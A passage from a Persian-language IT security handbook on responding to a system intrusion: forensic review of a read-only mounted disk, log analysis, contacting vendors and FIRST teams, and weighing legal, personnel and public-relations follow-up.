ﻣﺎﺷﻴﻦ ﺩﺳﺘﻜﺎﺭﻱﺷﺪﻩ ﺗﺤﺖ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ،ﺍﺭﺗﺒﺎﻁ ﺁﻥ ﺑﺎ ﺷﺒﻜﻪ ﻗﻄﻊ ﺑﺎﺷﺪ(.
ﻫﻤﭽﻨﻴﻦ ﻣﻤﻜﻦ ﺍﺳﺖ ﻻﺯﻡ ﺑﺎﺷﺪ ﺗﻤﺎﻡ ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ ﺭﺍ ﻭﺍﺭﺳﻲ ﻛﻨﻴﺪ ﺗﺎ ﺑﺒﻴﻨﻴﺪ ﺑﻪ ﭼﻪ ﻓﺎﻳﻠﻬﺎ ﻭ ﺷﺎﺧﻪﻫﺎﻳﻲ ﺩﺭ ﺣﻮﻝ ﻭ ﺣﻮﺵ ﺯﻣـﺎﻥ ﺣﻤﻠـﻪ
ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﺷﺪﻩ ﺍﺳﺖ .ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺷﻤﺎ ﺳﺮﻧﺨﻬﺎﻳﻲ ﺍﺯ ﺍﻳﻨﻜﻪ ﭼﻪ ﺍﺗﻔﺎﻗﻲ ﺍﻓﺘـﺎﺩﻩ ﺑﺪﻫـﺪ .ﺑـﺮﺍﻱ ﻧﻤﻮﻧـﻪ ﺍﮔـﺮ ﻛﺎﻣﭙـﺎﻳﻠﺮ،
ﻻ ﻣﻬـﺎﺟﻢ ﻳـﻚ ﻗﻄﻌـﻪﺑﺮﻧﺎﻣـﻪ ﺭﺍ ﺑﺎﺭﻛﻨﻨﺪﻩ ٣٤٤ﻭ ﻛﺘﺎﺑﺨﺎﻧﻪﻫﺎ ﺯﻣﺎﻧﻬﺎﻱ ﺩﺳﺘﺮﺳﻲ ﻧﺰﺩﻳﻜﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ،ﻣﻲﺗﻮﺍﻥ ﻧﺘﻴﺠﻪ ﮔﺮﻓـﺖ ﻛـﻪ ﺍﺣﺘﻤـﺎ ﹰ
ﻛﺎﻣﭙﺎﻳﻞ ﻛﺮﺩﻩ ﺍﺳﺖ.
ﺍﮔﺮ ﻓﺎﻳﻠﻲ ﺭﺍ ﺑﺎﺯ ﻛﻨﻴﺪ ﺗﺎ ﺩﺭ ﺁﻥ ﺑﻪ ﺩﻧﺒﺎﻝ ﺗﻐﻴﻴﺮﺍﺕ ﺑﮕﺮﺩﻳﺪ ،ﺯﻣﺎﻥ ﺁﺧﺮﻳﻦ ﺩﺳﺘﺮﺳﻲﺍﺵ ﻋﻮﺽ ﻣﻲﺷﻮﺩ ﻭ ﺩﻳﮕﺮ ﻧﺨﻮﺍﻫﻴﺪ ﺗﻮﺍﻧﺴﺖ ﺍﻟﮕﻮﻫـﺎﻱ
ﺩﺳﺘﺮﺳﻲ ﺭﺍ ﻣﺘﻮﺟﻪ ﺷﻮﻳﺪ .ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺗﻮﺻﻴﻪ ﻣﻲﻛﻨﻴﻢ ﻛﻪ ﺗﺤﻘﻴﻘﺎﺕ ﺧﻮﺩ ﺭﺍ ﺭﻭﻱ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﺩﻳﺴﻚ ﻛﻪ ﺑﺼﻮﺭﺕ ﻓﻘـﻂ ﺧﻮﺍﻧـﺪﻧﻲ
mountﺷﺪﻩ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ .ﺍﮔﺮ ﺑﺮﺍﻱ ﺗﻬﻴﺔ ﻧﺴﺨﺔ ﺩﻭﻡ ﺳﺨﺖﺍﻓﺰﺍﺭ ﻣﻨﺎﺳﺐ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻧﺪﺍﺭﻳﺪ ،ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ ﻛـﻪ
ﺍﻏﻠﺐ ﺳﻴﺴﺘﻤﻬﺎ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﻨﺪ ﻛﻪ partitionﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺍﺳﺘﻔﺎﺩﺓ ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ ﺭﺍ ﻣﺠﺪﺩﹰﺍ ﺑﺼﻮﺭﺕ ﻓﻘﻂﺧﻮﺍﻧﺪﻧﻲ mountﻛﻨﻴﺪ )ﺍﺣﺘﻤﺎ ﹰ
ﻻ
ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ ﻭﺍﺳﻂ ﻛﺎﺭﺑﺮﻱ ﺑﺎﺯﮔﺸﺘﻲ( .ﺗﺤﻘﻴﻘﺎﺕ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺍﻳﻦ ﻃﺮﻳﻖ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ ،ﺍﻣﺎ ﺑﻪ ﻳﺎﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺑﺎ ﺍﻳﻦ ﺗﻨﻈﻴﻤـﺎﺕ ﻫـﻢ ﺍﺟـﺮﺍﻱ
ﺩﺳﺘﻮﺭﺍﺕ ﺑﺎﻋﺚ ﺧﻮﺍﻫﺪ ﺷﺪ ﻛﻪ ﺁﺧﺮﻳﻦ ﺯﻣﺎﻥ ﺩﺳﺘﺮﺳﻲ ﻓﺎﻳﻠﻬﺎ ﻭ ﺗﻤﺎﻡ ﻛﺘﺎﺑﺨﺎﻧﻪﻫﺎﻱ ﻣﺸﺘﺮﻙ ﻭ ﻓﺎﻳﻠﻬﺎﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺗﻐﻴﻴﺮ ﻳﺎﺑﻨﺪ )ﻣﮕـﺮ ﺍﻳﻨﻜـﻪ
ﻫﻤﻪ partitionﻫﺎ ﺭﺍ ﻣﺠﺪﺩﹰﺍ mountﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ!( .ﺩﺭﻧﺘﻴﺠﻪ ﺑﻬﺘﺮﻳﻦ ﻛﺎﺭﻱ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﻧﺠﺎﻡ ﺩﻫﻴـﺪ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ ﺩﻳـﺴﻜﻬﺎ ﺭﺍ ﺭﻭﻱ ﻳـﻚ
ﺳﻴﺴﺘﻢ ﺩﻳﮕﺮ ﺑﺼﻮﺭﺕ ﻓﻘﻂﺧﻮﺍﻧﺪﻧﻲ mountﻛﻨﻴﺪ ﻭ ﺑﺮﺭﺳﻴﻬﺎﻱ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺁﻧﺠﺎ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ.
344 Loader
۳۴۵ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ tripwireﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻳﺎ ﻳﻚ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺍﺧﺘﺼﺎﺻﻲ ﺧﻮﺩﺗﺎﻥ ﺭﺍ ﺗﻬﻴﻪ ﻧﻤﺎﻳﻴﺪ.
٤٣٩ ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﻗﺪﻡ ﺑﻌﺪﻱ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻳﻚ ﻧﺴﺨﺔ ﭼﺎﭘﻲ ﺍﺯ ﺗﻤﺎﻡ ﺛﺒﺘﻬﺎﻱ ﻻﺯﻣﻲ ﻛﻪ ﺩﺭ ﺩﺳﺘﺮﺱ ﺩﺍﺭﻳﺪ ﺗﻬﻴﻪ ﻛﻨﻴﺪ )ﻣﺜ ﹰﻼ ﺛﺒﺘﻬﺎﻱ ﺭﺍﻳﺎﻧﻪ ﻭ ﺷـﺒﻜﻪ( ،ﻭ ﺁﻧﻬـﺎ ﺭﺍ
ﺑﺮﺭﺳﻲ ﻧﻤﺎﻳﻴﺪ ﺗﺎ ﺑﻔﻬﻤﻴﺪ ﻧﻔﻮﺫﮔﺮ ﭼﻪ ﻛﺎﺭﻫﺎﻱ ﻏﻴﺮﻣﺠﺎﺯﻱ ﺍﻧﺠﺎﻡ ﺩﺍﺩﻩ ﺍﺳﺖ .ﻫﻤﭽﻨﻴﻦ ﺑﺎﻳـﺪ ﺑﻔﻬﻤﻴـﺪ ﻛـﻪ ﺁﻳـﺎ ﺍﺯ ﺯﻣـﺎﻥ ﻭﺭﻭﺩ ﻧﻔـﻮﺫﮔﺮ ،ﺩﺭ
ﺳﻴﺴﺘﻢ ﺍﺗﻔﺎﻕ ﻏﻴﺮﻋﺎﺩﻱ ﺭﺥ ﺩﺍﺩﻩ ﻳﺎ ﺧﻴﺮ .ﺍﻳﻦ ﺛﺒﺘﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﻓﻬﻢ ﺍﻳﻨﻜﻪ ﻧﻔﻮﺫﮔﺮ ﭼﻪ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﺍﺟﺮﺍ ﻛﺮﺩﻩ ﻭ ﭼﻪ ﺍﻋﻤـﺎﻟﻲ ﺍﻧﺠـﺎﻡ ﺩﺍﺩﻩ
ﺍﺳﺖ ﺑﻪ ﺷﻤﺎ ﻛﻤﻚ ﻛﻨﻨﺪ .ﻓﺮﺍﻣﻮﺵ ﻧﻜﻨﻴﺪ ﻛﻪ ﺑﺮﮔﻪﻫﺎﻱ ﭼﺎﭘﻲ ﺭﺍ ﺣﺘﻤﹰﺎ ﻳﻚ ﺑﻪ ﻳﻚ ﺗﺎﺭﻳﺦ ﻭ ﺍﻣﻀﺎ ﺑﺰﻧﻴﺪ.
ﺑﻪ ﺧﺎﻃﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺯﻣﺎﻥ ﻛﺸﻒ ﻳﻚ ﻧﻔﻮﺫ ﻟﺰﻭﻣﹰﺎ ﺯﻣﺎﻥ ﺷﺮﻭﻉ ﺁﻥ ﻧﻴﺴﺖ .ﺩﺭ ﻳﻚ ﻣﻮﺭﺩ ﻧﻤﻮﻧﻪ ،ﻣﺪﺍﺭﻙ ﻧﺸﺎﻥ ﺩﺍﺩﻧﺪ ﻛﻪ ﻧﻔﻮﺫ ﻭﺍﻗﻌـﻲ
ﺍﺯ ﺩﻭ ﺳﺎﻝ ﻗﺒﻞ ﺍﺯ ﻛﺸﻒ ﺷﺪﻥ ﺷﺮﻭﻉ ﺷﺪﻩ ﺑﻮﺩ! ﻃﺒﻴﻌﻲ ﺍﺳﺖ ﻛﻪ ﺑﻌﺪ ﺍﺯ ﺍﻳﻦ ﻣﺪﺕ ﻫﻴﭻ ﭘﺸﺘﻴﺒﺎﻥ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻗﺎﺑﻞ ﺍﻋﺘﻤﺎﺩﻱ ﺭﻭﻱ ﺳﻴـﺴﺘﻢ
ﻭﺟﻮﺩ ﻧﺪﺍﺷﺖ .ﺩﺭ ﻭﺍﻗﻊ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺩﺭ ﻃﻮﻝ ﺍﻳﻦ ﻣﺪﺕ ﺗﻐﻴﻴﺮﺍﺕ ﺯﻳﺎﺩﻱ ﺩﺭ ﺳﻴﺴﺘﻢ ﻣﻲﺩﺍﺩﻧﺪ؛ ﺍﺯ ﺟﻤﻠﻪ ﻧﺼﺐ ﻭﺻﻠﻪﻫﺎ ﻭ ﺍﺭﺗﻘﺎﻫﺎ! ﺩﺭ ﺍﻳﻦ ﻣﻮﺭﺩ
ﻣﻲﺗﻮﺍﻥ ﮔﻔﺖ ﻧﻔﻮﺫﮔﺮﺍﻥ ﻛﺎﺭ ﺭﺍﻫﺒﺮﻱ ﺭﺍ ﺑﻬﺘﺮ ﺍﺯ ﻣﺴﺌﻮﻝ ﻳﺎ ﻣﺴﺌﻮﻟﻴﻦ ﺁﻥ ﺍﻧﺠﺎﻡ ﻣﻲﺩﺍﺩﻧﺪ!
ﺍﮔﺮ ﺁﺩﺭﺱ IPﺧﺎﺻﻲ ﺭﺍ ﻛﻪ ﻣﻬﺎﺟﻢ ﺑﻌﻨﻮﺍﻥ ﻣﺒﺪﺃ ﺣﻤﻠﻪ ﺑﻜﺎﺭ ﺑﺮﺩﻩ ﻣﻲﺩﺍﻧﻴﺪ ،ﺩﺭ ﺗﻤﺎﻡ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺧﻮﺩ ﺑـﺪﻧﺒﺎﻝ ﻳـﺎﻓﺘﻦ ﺳـﻮﺍﺑﻖ ﺁﻥ .٣
ﺁﺩﺭﺱ ﺑﺎﺷﻴﺪ.
ﺍﮔﺮ ﻣﺸﻜﻮﻙ ﺑﻪ ﺍﻳﻦ ﻫﺴﺘﻴﺪ ﻛﻪ ﺍﺷﻜﺎﻟﻲ ﺩﺭ ﻳﻚ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺳﻴﺴﺘﻤﻲ ﺑﺎﻋﺚ ﻧﻔﻮﺫ ﺷﺪﻩ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺮﺍﻱ ﻣﺸﻮﺭﺕ ﺑـﺎ ﺗﻮﻟﻴﺪﻛﻨﻨـﺪﺓ ﺁﻥ ﺗﻤـﺎﺱ
ﻻ ﺭﺍﻩﺣﻠﻲ ﺑﺮﺍﻱ ﻣﺸﻜﻠﻬﺎﻱ ﺭﺍﻳﺞ ﺩﺍﺭﻧﺪ .ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﻣﻮﺍﺭﺩ ﺍﮔﺮ ﻗﺮﺍﺭﺩﺍﺩ ﺷﻤﺎ ﺑﺎ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺷﺎﻣﻞ ﭘﺸﺘﻴﺒﺎﻧﻲ ﭘـﺲ
ﺑﮕﻴﺮﻳﺪ؛ ﭼﺮﺍﻛﻪ ﺁﻧﻬﺎ ﻣﻌﻤﻮ ﹰ
ﺍﺯ ﻓﺮﻭﺵ ﻫﻢ ﺑﺸﻮﺩ ﻭ ﻳﺎ ﺷﻤﺎ ﻳﻚ ﻣﺸﺘﺮﻱ ﻋﻤﺪﺓ ﺁﻧﻬﺎ ﺑﺎﺷﻴﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﻗﺒﻞ ﺑﻪ ﻧﺘﻴﺠﻪﺑﺨﺶ ﺑﻮﺩﻥ ﺍﻳﻦ ﺗﻤﺎﺱ ﺍﻣﻴﺪﻭﺍﺭ ﺑﺎﺷﻴﺪ.
ﻻ ﺁﺳﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻱ ﺟﺪﻳـﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻧﮕﺎﻫﻲ ﻧﻴﺰ ﺑﻪ ﻣﻄﺎﻟﺐ ﺟﺪﻳﺪ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﻭ ﻓﻬﺮﺳﺘﻬﺎﻱ ﭘﺴﺘﻲ ﮔﺮﻭﻫﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻴﺎﻧﺪﺍﺯﻳﺪ .ﻣﻌﻤﻮ ﹰ
ﺩﺭ ﺍﻳﻦ ﻣﻜﺎﻧﻬﺎ ﺑﺎ ﺟﺰﺋﻴﺎﺕ ﺯﻳﺎﺩﻱ ﻣﻮﺭﺩ ﺑﺤﺚ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ .ﺩﺭ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﻧﻴﺰ ﭘﻴﺶ ﻣﻲﺁﻳﺪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺩﺭﻭﻥ ﺍﻳﻦ ﭘﺎﻳﮕﺎﻫﻬﺎ ﺍﺷﺘﺒﺎﻩ ﻳـﺎ
ﺧﻄﺮﻧﺎﻙ ﻫﺴﺘﻨﺪ؛ ﻭ ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑﺴﻴﺎﺭ ﻣﺮﺍﻗﺐ ﺁﻧﭽﻪ ﻛﻪ ﻣﻲﺧﻮﺍﻧﻴﺪ ﺑﺎﺷﻴﺪ.
ﻻ ﺩﻳﺪ ﺧﻮﺑﻲ ﻧـﺴﺒﺖ ﺑـﻪ ﻧﻔﻮﺫﻫـﺎﻱ ﺩﺭ ﻧﻬﺎﻳﺖ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺨﻮﺍﻫﻴﺪ ﺑﺎ ﻳﻚ ﺗﻴﻢ ﺧﻮﺏ FIRSTﺗﻤﺎﺱ ﺑﮕﻴﺮﻳﺪ .ﺗﻴﻤﻬﺎﻱ FIRSTﻣﻌﻤﻮ ﹰ
ﺟﺪﻳﺪ ﺩﺍﺭﻧﺪ ،ﻛﻪ ﺩﻟﻴﻞ ﻋﻤﺪﺓ ﺁﻥ ﮔﺰﺍﺭﺷﻬﺎﻱ ﺯﻳﺎﺩ ﺩﺭﻳﺎﻓﺘﻲ ﺁﻧﻬﺎ ﺍﺳﺖ .ﺩﺭ ﺗﻤﺎﺱ ﺑﻮﺩﻥ ﺑﺎ ﻧﻤﺎﻳﻨﺪﺓ ﻳﻜﻲ ﺍﺯ ﺍﻳﻦ ﺗﻴﻤﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﻧﺘـﺎﻳﺞ ﺧـﻮﺑﻲ
ﺑﻪ ﻫﻤﺮﺍﻩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻭ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﻨﻜﻪ ﭼﻪ ﭼﻴﺰﻫﺎﻳﻲ ﺭﺍ ﺑﺎﻳﺪ ﻗﺒﻞ ﺍﺯ ﺑﺎﺯﮔﺮﺩﺍﻧﺪﻥ ﺳﻴﺴﺘﻢ ﺑﻪ ﻛﺎﺭ ﻭﺍﺭﺳـﻲ ﻛﻨﻴـﺪ ﺑـﺮﺍﻱ ﺷـﻤﺎ ﺭﺍﻫﻨﻤﺎﻳﻴﻬـﺎﻱ
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٤٤٠
ﺍﺭﺯﻧﺪﻩﺍﻱ ﺑﻪ ﺍﺭﻣﻐﺎﻥ ﺁﻭﺭﺩ .ﺑﺎ ﺍﻳﻦ ﻭﺟﻮﺩ ﺑﻌﻀﻲ ﺗﻴﻤﻬـﺎ ﻗـﻮﺍﻧﻴﻨﻲ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﻃﺒـﻖ ﺁﻥ ﻧﻤـﻲﺗﻮﺍﻧﻨـﺪ ﺻـﺮﺍﺣﺘﹰﺎ ﺍﻃﻼﻋـﺎﺕ ﺯﻳـﺎﺩﻱ ﺩﺭ ﻣـﻮﺭﺩ
ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺭﻭﺯ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻛﺴﻲ ﻗﺮﺍﺭ ﺩﻫﻨﺪ ﺗﺎ ﺑﻪ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﺓ ﻣﺮﺑﻮﻃﻪ ﺍﻳﻦ ﻓﺮﺻﺖ ﺭﺍ ﺩﺍﺩﻩ ﺑﺎﺷﻨﺪ ﻛﻪ ﺍﺻﻼﺡ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﺁﻧـﺮﺍ ﻣﻨﺘـﺸﺮ
ﻛﻨﺪ .ﺩﺭﻧﺘﻴﺠﻪ ﺍﻳﻦ ﺍﺣﺘﻤﺎﻝ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻧﺘﻮﺍﻧﻴﺪ ﺍﻃﻼﻋﺎﺕ ﻛﺎﻣﻠﻲ ﺍﺯ ﺍﻳﻦ ﻣﻨﺎﺑﻊ ﺑﺪﺳﺖ ﺁﻭﺭﻳﺪ.
ﻛﻨﺘﺮﻝ ﺧﺴﺎﺭﺗﻬﺎ
ﺍﮔﺮ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺗﺮﻣﻴﻢ ﻛﺮﺩﻩﺍﻳﺪ ،ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﻭ ﺑﺒﻴﻨﻴﺪ ﭼﻪ ﺧﺴﺎﺭﺗﻬﺎﻱ ﺩﻳﮕﺮﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﺎﻳﺪ ﺁﻧﻬﺎ ﺭﺍ ﻛﻨﺘﺮﻝ ﻛﻨﻴﺪ .ﺩﺭ ﺩﺭﺟـﺔ ﺍﻭﻝ
ﺑﺎﻳﺪ ﺑﻪ ﺳﺮﺍﻍ ﺗﺄﺛﻴﺮﺍﺕ ﺑﻌﺪﻱ ﻳﻚ ﻧﻔﻮﺫ ﺭﻓﺖ ﻭ ﻫﺮﮔﻮﻧﻪ ﻋﻮﺍﻗﺐ ﺗﺒﻬﻜﺎﺭﺍﻧﺔ ﻧﻔـﻮﺫ ﺭﺍ ﺩﺭ ﻧﻈـﺮ ﮔﺮﻓـﺖ .ﺑـﺮﺍﻱ ﻣﺜـﺎﻝ ﺁﻳـﺎ ﺩﺭ ﺟﺮﻳـﺎﻥ ﻧﻔـﻮﺫ ﺍﺯ
ﺍﻃﻼﻋﺎﺕ ﺧﺼﻮﺻﻲ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﺷﺪﻩ ﺍﺳﺖ؟ ﺍﮔﺮ ﺁﺭﻱ ،ﺑﺎﻳﺪ ﺑﺎ ﻣﺸﺎﻭﺭ ﺭﺳﻤﻲ ﺧﻮﺩ ﻣﺸﻮﺭﺕ ﻛﻨﻴﺪ ﻭ ﺗﺼﻤﻴﻢ ﺑﮕﻴﺮﻳﺪ ﻛـﻪ ﺩﺭ ﺍﻳـﻦ ﻣﺮﺣﻠـﻪ
ﻣﻲﺧﻮﺍﻫﻴﺪ ﭼﻪ ﻛﺎﺭﻱ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ.
ﺑﺎﻳﺪ ﺗﻌﻴﻴﻦ ﻛﻨﻴﺪ ﻛﺪﺍﻡ ﻳﻚ ﺍﺯ ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﺯﻳﺮ ﺭﺍ ﺑﺎﻳﺪ ﺑﻴﺸﺘﺮ ﻣﻮﺭﺩ ﺗﻮﺟﻪ ﻗﺮﺍﺭ ﺩﻫﻴﺪ ﻭ ﺩﺭ ﻣﻮﺭﺩ ﻫﺮﻳﻚ ﻣﻲﺧﻮﺍﻫﻴﺪ ﭼﻪ ﻛﺎﺭﻱ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ:
ﺁﻳﺎ ﻧﻴﺎﺯ ﺑﻪ ﺗﺸﻜﻴﻞ ﻳﻚ ﭘﺮﻭﻧﺪﺓ ﺭﺳﻤﻲ ﺩﺭ ﺩﻭﺍﻳﺮ ﺍﺟﺮﺍﻱ ﻗﺎﻧﻮﻥ ،ﻳﻚ ﺩﻓﺘﺮ ﺣﻘـﻮﻗﻲ ،ﻳـﻚ ﺷـﺮﻛﺖ ﺑﻴﻤـﻪ ،ﻳـﺎ ﻧـﺰﺩ ﺗﻮﻟﻴﺪﻛﻨﻨـﺪﮔﺎﻥ ﻭ .١
ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻣﺤﺼﻮﻻﺕ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ ﺧﻮﺩ ﺩﺍﺭﻳﺪ؟
ﺁﻳﺎ ﺑﺎﻳﺪ ﻳﻚ ﻳﺎ ﭼﻨﺪ ﻛﺎﺭﻣﻨﺪ ﺳﺎﺯﻣﺎﻥ ﺧﻮﺩ ﺭﺍ ﺍﺧﺮﺍﺝ ﻛﻨﻴﺪ ﻳﺎ ﺩﺭ ﻣﻮﺭﺩ ﺁﻧﻬﺎ ﻗﻮﺍﻧﻴﻦ ﺍﻧﻀﺒﺎﻃﻲ ﺍﻋﻤﺎﻝ ﻛﻨﻴﺪ؟ ﺁﻳﺎ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻭﻗﻮﻉ .٢
ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻳﻨﭽﻨﻴﻨﻲ ﺩﺭ ﺁﻳﻨﺪﻩ ﺑﺎﻳﺪ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺧﻮﺩ ﺭﺍ ﺗﺤﺖ ﺁﻣﻮﺯﺵ ﻗﺮﺍﺭ ﺩﻫﻴﺪ؟
ﺁﻳﺎ ﻧﻴﺎﺯﻣﻨﺪ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻃﺮﺡ "ﺗﺮﻣﻴﻢ ﺍﺯ ﺳﻮﺍﻧﺢ" ﺧﻮﺩ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺗﺠﺮﺑﻴﺎﺕ ﺍﻳﻦ ﻭﺍﻗﻌﻪ ﻫﺴﺘﻴﺪ؟ .٣
ﺁﻳﺎ ﻧﻴﺎﺯ ﺑﻪ ﺑﺎﺯﺭﺳﻲ ﻭ ﺍﺻﻼﺡ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻳﺎ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﺤﺖ ﻛﻨﺘﺮﻝ ﺧﻮﺩ ﻳﺎ ﺳﺎﻳﺮ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺍﺑﺴﺘﻪ ﺩﺍﺭﻳﺪ؟ .٤
ﺁﻳﺎ ﺍﺩﺍﺭﺓ ﺭﻭﺍﺑﻂ ﻋﻤﻮﻣﻲ ﺷﻤﺎ ﺑﺎﻳﺪ ﺩﺭ ﺍﻳﻦ ﺭﺍﺑﻄﻪ ﻳﻚ ﮔﺰﺍﺭﺵ ﺭﺳﻤﻲ )ﺩﺭ ﺩﺍﺧﻞ ﻳﺎ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺯﻣﺎﻥ( ﻣﻨﺘﺸﺮ ﻛﻨﺪ؟ .٥
ﻼ ﻣﺘﻔﺎﻭﺕ ﺑﺎﺷﺪ.
ﭘﺎﺳﺨﻬﺎﻱ ﺷﻤﺎ ﺳﺆﺍﻻﺕ ﺑﺎﻻ ﺑﺴﺘﻪ ﺑﻪ ﻣﻮﻗﻌﻴﺖ ﺳﺎﺯﻣﺎﻥ ﻭ ﺍﻫﻤﻴﺖ ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘﻲ ﻣﻲﺗﻮﺍﻧﺪ ﻛﺎﻣ ﹰ
٤٤١ ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﻓﺼﻞ ﺩﻫﻢ
ﻧﻜﺎﺕ ﻭﻳﮋﺓ ﺑﺴﺘﺮﻫﺎﻱ ﻣﺨﺘﻠﻒ
ﻛﻠﻴﺎﺕ
ﺑﻴﺸﺘﺮ ﻣﻄﺎﻟﺐ ﺍﻳﻦ ﻛﺘﺎﺏ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﻫﺮ ﻧﻮﻉ ﺳﺨﺖﺍﻓﺰﺍﺭ ﻳﺎ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺑﻜﺎﺭ ﺭﻭﺩ .ﺩﺭ ﺍﻳﻦ ﺑﺨﺶ ﺑﻪ ﺗﻮﺻﻴﻪﻫﺎﻱ ﻓﻨـﻲ ﺧـﺎﺹ ﺑـﺮﺍﻱ
ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ Unixﻭ ،Microsoft Windows ،Linuxﻭ MacOS 7-9ﻣﻲﭘﺮﺩﺍﺯﻳﻢ) .ﻣﻄﺎﻟـﺐ ﻣﺮﺑـﻮﻁ ﺑـﻪ MacOS Xﺩﺭ ﻗـﺴﻤﺖ
ﻣﺮﺑﻮﻁ ﺑﻪ Unixﮔﻨﺠﺎﻧﺪﻩ ﺷﺪﻩﺍﻧﺪ(.
٣٤٦
Unixﻭ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻣﺸﺎﺑﻪ
